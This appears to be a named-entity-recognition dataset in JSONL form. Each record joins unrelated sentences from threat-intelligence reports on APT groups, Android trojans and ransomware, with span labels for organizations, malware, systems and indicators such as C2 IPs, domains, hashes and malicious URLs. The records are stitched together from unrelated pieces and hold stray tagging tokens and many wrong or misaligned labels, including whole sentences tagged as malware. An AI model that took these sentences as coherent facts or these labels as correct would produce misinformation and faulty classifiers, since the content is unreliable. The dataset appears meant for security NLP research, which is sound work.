that you have been targeted by this operation , please e-mail us at : shadowhammer@kaspersky.com . 
Instead , it \u2019s likely that Royal is simply testing a new encryptor \u2014 especially considering that BlackSuit was used in just two attacks last month \u2014 and that this lull can be explained as more or less of a research period for them .", "spans": [{"start": 137, "end": 143, "label": "Organization"}, {"start": 148, "end": 156, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 398, "end": 403, "label": "Malware"}, {"start": 424, "end": 437, "label": "System"}, {"start": 468, "end": 477, "label": "Malware"}]} {"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . Kaspersky Lab verdicts for the malware used in this and related attacks . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 55, "end": 59, "label": "System"}, {"start": 62, "end": 72, "label": "System"}, {"start": 75, "end": 85, "label": "System"}, {"start": 90, "end": 96, "label": "System"}, {"start": 99, "end": 110, "label": "Malware"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 364, "end": 376, "label": "Organization"}, {"start": 454, "end": 479, "label": "System"}]} {"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers \u2013 all operated on CHINANET , and hosted in Guangdong Province . ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen . 
The first step is the previously unknown OWA exploit technique .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 314, "label": "Malware"}, {"start": 317, "end": 346, "label": "Malware"}]} {"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province . ShadowHammer : asushotfix.com . We expect KillNet and its affiliates to continue conducting distributed denial - of - service ( DDoS ) and hack - and - leak operations intended to disrupt government and critical infrastructure functions in countries providing financial , economic , diplomatic or military support to Ukraine .", "spans": [{"start": 41, "end": 51, "label": "System"}, {"start": 74, "end": 81, "label": "System"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 186, "end": 191, "label": "System"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 312, "end": 326, "label": "Indicator"}, {"start": 339, "end": 346, "label": "Organization"}]} {"text": "This helps the C2 define what actions it can do before being detected on the mobile device . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . ShadowHammer : 141.105.71.116 . 
The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 114, "end": 125, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 281, "end": 293, "label": "Organization"}, {"start": 296, "end": 310, "label": "Indicator"}, {"start": 325, "end": 341, "label": "Vulnerability"}, {"start": 365, "end": 368, "label": "Organization"}, {"start": 375, "end": 389, "label": "Vulnerability"}]} {"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip . The size of the industry has been expanding in the US and globally , with significant revenue increases making it an appealing target for ransoms .", "spans": [{"start": 172, "end": 181, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 233, "end": 241, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 312, "end": 324, "label": "Organization"}, {"start": 327, "end": 419, "label": "Indicator"}]} {"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip . 
Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": [{"start": 20, "end": 41, "label": "System"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 279, "end": 373, "label": "Indicator"}, {"start": 417, "end": 432, "label": "System"}]} {"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 285, "end": 379, "label": "Indicator"}]} {"text": "For example , when a button is clicked , a view is focused , etc . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip . 
Umbrella , Cisco \u2019s secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs and URLs , whether users are on or off the corporate network .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 128, "end": 151, "label": "Organization"}, {"start": 174, "end": 186, "label": "Organization"}, {"start": 189, "end": 283, "label": "Indicator"}, {"start": 286, "end": 294, "label": "System"}, {"start": 297, "end": 337, "label": "System"}]} {"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East . ShadowHammer : Liveupdate_Test_VER365.zip . In the UK , education has suffered a significant drop in funding in the last decade , according to the non - partisan Education Policy Institute .", "spans": [{"start": 163, "end": 180, "label": "System"}, {"start": 246, "end": 255, "label": "System"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 340, "end": 352, "label": "Organization"}, {"start": 355, "end": 381, "label": "Indicator"}, {"start": 502, "end": 528, "label": "Organization"}]} {"text": "There is a function called \" performGlobalAction '' with the description below . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China \u2014 so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China . ShadowHammer : aa15eb28292321b586c27d8401703494 . 
In a recent survey , respondents indicated that 57 of all observed vulnerabilities are more than two years old , with as many as 17 being more than five years old .", "spans": [{"start": 89, "end": 94, "label": "Organization"}, {"start": 109, "end": 119, "label": "System"}, {"start": 122, "end": 126, "label": "System"}, {"start": 133, "end": 136, "label": "System"}, {"start": 167, "end": 180, "label": "Organization"}, {"start": 208, "end": 212, "label": "System"}, {"start": 291, "end": 303, "label": "Organization"}, {"start": 306, "end": 338, "label": "Indicator"}, {"start": 399, "end": 423, "label": "Vulnerability"}]} {"text": "Android documentation describes that function as \" a global action . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia . The ransom note is also used to generate a message in the form of the background wallpaper typically located at \u201c C:/Users / Public / bg.jpg \u201d .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 367, "end": 382, "label": "Malware"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 558, "end": 609, "label": "Indicator"}]} {"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal . 
In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia E-LOC throughout 2017 and 2018 . The session takeovers bypassed password and multi - factor authentication .", "spans": [{"start": 154, "end": 158, "label": "System"}, {"start": 232, "end": 245, "label": "Organization"}, {"start": 343, "end": 346, "label": "System"}, {"start": 384, "end": 391, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}]} {"text": "For example , going back , going home , opening recents , etc . We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers . In recent attacks , the group has persistently targeted at least one government organization in Cambodia B-LOC E-IDTY from December 2018 through January 2019 . These victims are not criminals or terrorists , but instead , they are associated with activism .", "spans": [{"start": 177, "end": 181, "label": "System"}, {"start": 208, "end": 227, "label": "System"}, {"start": 230, "end": 233, "label": "System"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 353, "end": 379, "label": "Organization"}, {"start": 531, "end": 539, "label": "Organization"}]} {"text": "'' The trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . While researching these attacks , we discovered an undocumented , custom malware family \u2013 which we \u2019ve named Dudell . 
Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 215, "end": 224, "label": "Malware"}, {"start": 252, "end": 271, "label": "Malware"}, {"start": 449, "end": 455, "label": "Malware"}, {"start": 458, "end": 469, "label": "Organization"}]} {"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net . In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 211, "end": 219, "label": "System"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 240, "end": 264, "label": "System"}, {"start": 287, "end": 314, "label": "System"}, {"start": 317, "end": 320, "label": "System"}, {"start": 325, "end": 335, "label": "System"}, {"start": 338, "end": 347, "label": "System"}, {"start": 350, "end": 359, "label": "System"}, {"start": 362, "end": 371, "label": "System"}, {"start": 376, "end": 383, "label": "System"}, {"start": 430, "end": 437, "label": "Malware"}, {"start": 558, "end": 563, "label": "Organization"}, {"start": 628, "end": 636, "label": "Malware"}, {"start": 655, "end": 697, "label": "Vulnerability"}]} {"text": "The beaconing only starts after the application is installed and removed from the running tasks . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 . 
Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware S-MALon S-MALvictim systems . Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 255, "end": 261, "label": "Organization"}, {"start": 379, "end": 393, "label": "Organization"}, {"start": 531, "end": 545, "label": "Organization"}, {"start": 590, "end": 607, "label": "Organization"}, {"start": 643, "end": 727, "label": "Malware"}]} {"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 . 
LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": [{"start": 134, "end": 142, "label": "Organization"}, {"start": 149, "end": 163, "label": "Organization"}, {"start": 170, "end": 181, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 284, "end": 297, "label": "Indicator"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 327, "end": 332, "label": "Malware"}, {"start": 353, "end": 371, "label": "Indicator"}, {"start": 375, "end": 395, "label": "Indicator"}, {"start": 399, "end": 401, "label": "System"}, {"start": 404, "end": 413, "label": "System"}]} {"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC . DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 147, "end": 161, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 236, "end": 242, "label": "Malware"}, {"start": 254, "end": 318, "label": "Indicator"}, {"start": 509, "end": 517, "label": "Organization"}]} {"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . DUDELL : File Type :M icrosoft Excel 97 \u2013 I-TOO 2 E-IDTY003 Document . 
By monitoring for indicators of compromise , organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks in earlier stages .", "spans": [{"start": 33, "end": 58, "label": "Indicator"}, {"start": 92, "end": 100, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}, {"start": 288, "end": 308, "label": "System"}]} {"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq . DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls . p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7", "spans": [{"start": 260, "end": 266, "label": "Malware"}, {"start": 279, "end": 327, "label": "Indicator"}, {"start": 330, "end": 380, "label": "Malware"}]} {"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed . The United States and countries in Europe are targeted as well . The DUDELL sample is a weaponized Microsoft Excel B-IDTY I-TOOL document that contains a malicious macro E-TOOL that runs on the victim \u2019s machine . Subscribing to the Talos weekly newsletter provides information about the most prevalent malware .", "spans": [{"start": 176, "end": 182, "label": "Malware"}, {"start": 206, "end": 215, "label": "System"}, {"start": 261, "end": 270, "label": "System"}, {"start": 271, "end": 283, "label": "System"}, {"start": 340, "end": 345, "label": "Organization"}]} {"text": "List of available commands The command names are self-explanatory . The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 . 
It shares the same malicious behavior reported by Checkpoint in Rancor : The Year of The Phish E-MAL SHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de . There are two types of logs identified that can be useful in identifying historical evidence of session hijacking after the successful exploitation of CVE-2023 - 4966 .", "spans": [{"start": 198, "end": 208, "label": "Organization"}, {"start": 212, "end": 218, "label": "Organization"}, {"start": 221, "end": 236, "label": "Malware"}, {"start": 255, "end": 295, "label": "Indicator"}, {"start": 449, "end": 464, "label": "Vulnerability"}]} {"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer . The MuddyWater attacks are primarily against Middle Eastern nations . In Check Point \u2019s blog , the sample is from December 2018 while this sample is from April 2018 . What is Cisco doing to take action against the growth of commercial spyware ?", "spans": [{"start": 102, "end": 133, "label": "Indicator"}, {"start": 369, "end": 380, "label": "Organization"}, {"start": 471, "end": 476, "label": "Organization"}]} {"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA . The macro in this document gets executed when the user views the document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document \u2019s properties . 
All downloaders attempt to download an image file from a URL .", "spans": [{"start": 43, "end": 58, "label": "Indicator"}, {"start": 229, "end": 234, "label": "System"}, {"start": 346, "end": 351, "label": "System"}, {"start": 446, "end": 506, "label": "Indicator"}]} {"text": "Base85 encoding is usually used on pdf and postscript documentsThe configuration of the malware is stored in custom preferences files , using the same obfuscation scheme . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The C2 server 199.247.6.253 is known to be used by the Rancor group . The first path ( /Library / Fonts / ArialUnicode.ttf.md5 ) stores the backdoor \u2019s full configuration , including its C2 servers .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 209, "end": 221, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 307, "end": 325, "label": "Organization"}, {"start": 328, "end": 350, "label": "Organization"}, {"start": 353, "end": 364, "label": "Organization"}, {"start": 367, "end": 386, "label": "Organization"}, {"start": 393, "end": 395, "label": "System"}, {"start": 403, "end": 416, "label": "Indicator"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 459, "end": 586, "label": "Malware"}]} {"text": "Activation cycle As we have explained above , the malware has several defence mechanisms . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . The script is downloading a second stage payload via the Microsoft tool msiexec . 
YARA Rules", "spans": [{"start": 95, "end": 121, "label": "Organization"}, {"start": 169, "end": 184, "label": "Malware"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 285, "end": 297, "label": "Organization"}, {"start": 357, "end": 366, "label": "Organization"}, {"start": 372, "end": 379, "label": "System"}]} {"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox mechanisms . MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" . Unfortunately at the time of discovery , the hosted file is unavailable . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 185, "end": 222, "label": "System"}, {"start": 233, "end": 243, "label": "System"}]} {"text": "After installation , the user needs to run the application . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 . Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available . 
The code is obfuscated , using an obfuscator script , based on the fact that some comments the actor did n\u2019t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax .", "spans": [{"start": 280, "end": 284, "label": "Organization"}, {"start": 336, "end": 343, "label": "Indicator"}, {"start": 405, "end": 423, "label": "Malware"}, {"start": 426, "end": 452, "label": "Malware"}]} {"text": "The user needs to press the \" close '' button to finish the installation . FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . Pivoting off the filename and directory , we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble . To say ransomware gangs have been unkind to the US in the past year is an understatement .", "spans": [{"start": 75, "end": 79, "label": "Organization"}, {"start": 85, "end": 103, "label": "Organization"}, {"start": 154, "end": 164, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 180, "end": 197, "label": "Organization"}, {"start": 289, "end": 295, "label": "Organization"}, {"start": 357, "end": 364, "label": "Indicator"}, {"start": 389, "end": 405, "label": "Organization"}]} {"text": "However , this wo n't close the application , it will send it to the background , instead . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" . File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color . 
The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 154, "end": 158, "label": "Organization"}, {"start": 215, "end": 228, "label": "System"}, {"start": 236, "end": 251, "label": "System"}, {"start": 254, "end": 266, "label": "System"}, {"start": 276, "end": 286, "label": "Indicator"}, {"start": 298, "end": 362, "label": "Indicator"}, {"start": 448, "end": 464, "label": "Vulnerability"}, {"start": 539, "end": 555, "label": "Vulnerability"}]} {"text": "While the application is in the background , although the service is already running , the beaconing will not start . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 . Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 154, "end": 163, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 221, "end": 228, "label": "Indicator"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 296, "end": 307, "label": "Organization"}, {"start": 444, "end": 460, "label": "System"}, {"start": 514, "end": 527, "label": "System"}]} {"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups . If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target . 
The Malware contains some other commands to do but not all of them are implemented yet .", "spans": [{"start": 114, "end": 134, "label": "System"}, {"start": 162, "end": 166, "label": "Organization"}, {"start": 169, "end": 179, "label": "Organization"}, {"start": 198, "end": 204, "label": "Organization"}, {"start": 219, "end": 226, "label": "Indicator"}, {"start": 275, "end": 285, "label": "Indicator"}, {"start": 363, "end": 374, "label": "Malware"}, {"start": 375, "end": 449, "label": "Malware"}]} {"text": "This will be the trigger for the service to start the beaconing . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation . DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . There is high turnover of staff , especially in entrylevel positions , which makes it difficult to ensure all staff have cybersecurity training .", "spans": [{"start": 107, "end": 115, "label": "Organization"}, {"start": 124, "end": 139, "label": "Organization"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 166, "end": 176, "label": "Organization"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 256, "end": 262, "label": "Malware"}, {"start": 281, "end": 345, "label": "Indicator"}, {"start": 357, "end": 379, "label": "Vulnerability"}, {"start": 434, "end": 491, "label": "Vulnerability"}]} {"text": "As mentioned previously , the beaconing is done every 60 seconds . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . DDKONG Plugin : Compile Date and Time : 2017-02-17 08:33:45 AM . 
Therefore , having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants .", "spans": [{"start": 96, "end": 113, "label": "System"}, {"start": 133, "end": 151, "label": "Malware"}, {"start": 160, "end": 172, "label": "System"}, {"start": 177, "end": 195, "label": "Malware"}, {"start": 198, "end": 221, "label": "Malware"}, {"start": 224, "end": 244, "label": "Malware"}, {"start": 255, "end": 302, "label": "Malware"}, {"start": 305, "end": 316, "label": "Malware"}, {"start": 373, "end": 379, "label": "Malware"}]} {"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 152, "end": 160, "label": "Organization"}, {"start": 183, "end": 204, "label": "Organization"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 333, "end": 336, "label": "System"}, {"start": 356, "end": 366, "label": "System"}, {"start": 369, "end": 386, "label": "Organization"}, {"start": 435, "end": 445, "label": "System"}]} {"text": "This time resets every time the user performs some activity . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts . DDKONG Plugin : File Name : H istory.nls . 
Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash values stored in the XPdb .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 172, "end": 180, "label": "System"}, {"start": 209, "end": 223, "label": "Organization"}, {"start": 230, "end": 251, "label": "System"}, {"start": 254, "end": 261, "label": "System"}, {"start": 268, "end": 288, "label": "System"}, {"start": 291, "end": 297, "label": "Malware"}, {"start": 319, "end": 331, "label": "Indicator"}, {"start": 382, "end": 400, "label": "Malware"}, {"start": 408, "end": 424, "label": "System"}]} {"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location . The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing . For this reason , the particular actions intended by the actor are unclear without further knowledge about the targeted assets .", "spans": [{"start": 215, "end": 229, "label": "Organization"}, {"start": 243, "end": 260, "label": "System"}, {"start": 310, "end": 329, "label": "System"}, {"start": 353, "end": 363, "label": "Malware"}, {"start": 525, "end": 530, "label": "Organization"}]} {"text": "Aside from the natural value of phone numbers associated with the names of their owners . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Once this export is called , it checks for a hidden window with a caption of Hello Google ! 
Based upon analysis and gathered data , we have determined that the operation is conducted by a Vietnamese threat actor .", "spans": [{"start": 144, "end": 152, "label": "System"}, {"start": 156, "end": 165, "label": "System"}, {"start": 168, "end": 176, "label": "Organization"}, {"start": 530, "end": 585, "label": "Malware"}]} {"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials . . Understand how the most dangerous Android threat could upend your entire business and how a devious cybercrime campaign on Windows involves in - depth reconnaissance to deliver the damaging malware to your network .", "spans": [{"start": 92, "end": 100, "label": "Organization"}, {"start": 137, "end": 144, "label": "System"}, {"start": 149, "end": 161, "label": "System"}, {"start": 244, "end": 251, "label": "System"}, {"start": 310, "end": 329, "label": "Organization"}, {"start": 333, "end": 340, "label": "System"}]} {"text": "One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 . This check is performed to ensure that only one instance of the malware is running at a time . 
A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 136, "end": 141, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 382, "end": 489, "label": "Indicator"}, {"start": 536, "end": 567, "label": "Organization"}, {"start": 579, "end": 678, "label": "Indicator"}, {"start": 696, "end": 704, "label": "Organization"}, {"start": 715, "end": 732, "label": "System"}]} {"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed . The Seedworm group is the only group known to use the Powermud backdoor . The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": [{"start": 91, "end": 105, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 141, "end": 158, "label": "System"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 350, "end": 422, "label": "Organization"}]} {"text": "The malware contains a list of 209 packages hardcoded in its source code . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East . This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed . 
